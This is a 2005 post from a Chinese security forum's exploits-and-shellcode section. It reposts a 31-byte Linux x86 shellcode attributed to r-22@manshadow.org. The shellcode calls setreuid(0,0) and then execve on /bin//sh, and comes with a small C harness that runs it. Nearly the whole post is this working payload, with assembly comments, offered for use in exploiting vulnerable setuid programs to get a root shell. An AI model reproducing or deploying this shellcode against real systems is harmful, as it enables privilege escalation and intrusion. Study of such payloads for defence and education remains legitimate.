31 byte setreuid() shellcode

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6819
精华: 834
积分: 36070
阅读权限: 255
性别: 男
来自: 中国
在线时间: 585 小时
注册时间: 2004-6-25
最后登录: 2008-8-28

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-1-10 08:52 只看该作者

31 byte setreuid() shellcode

文章作者：r-22@manshadow.org

复制内容到剪贴板

代码:

/* 31 byte setreuid() shellcode - # man shadow

 * os: Slackware 9.1, Phlak 2.4, Knoppix 0.1

 *

 * [url]www.manshadow.org[/url]

 * [email]r-22@manshadow.org[/email]

 * irc.efnet.net #_man_shadow

 */



char shellcode[] =

"\x31\xC9"          /* xor ecx,ecx    */

"\x31\xDB"          /* xor ebx,ebx    */

"\x6A\x46"          /* push byte 70   */

"\x58"            /* pop eax      */

"\xCD\x80"          /* int 80h      */

"\x51"            /* push ecx      */

"\x68\x2F\x2F\x73\x68"  /* push 0x68732F2F */

"\x68\x2F\x62\x69\x6E"  /* push 0x6E69622F */

"\x89\xE3"          /* mov ebx,esp    */

"\x51"            /* push ecx      */

"\x53"            /* push ebx      */

"\x89\xE1"          /* mov ecx,esp    */

"\x99"            /* cdq         */

"\xB0\x0B"          /* mov al,11     */

"\xCD\x80";         /* int 80h      */



int main(int argc, char *argv[]) {

    void (*sc)() = (void *)shellcode;

    printf("len:%d\n", strlen(shellcode));

    sc();

    return 0;

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » 毒箭羽翼[ Shellcodez Query ] » 31 byte setreuid() shellcode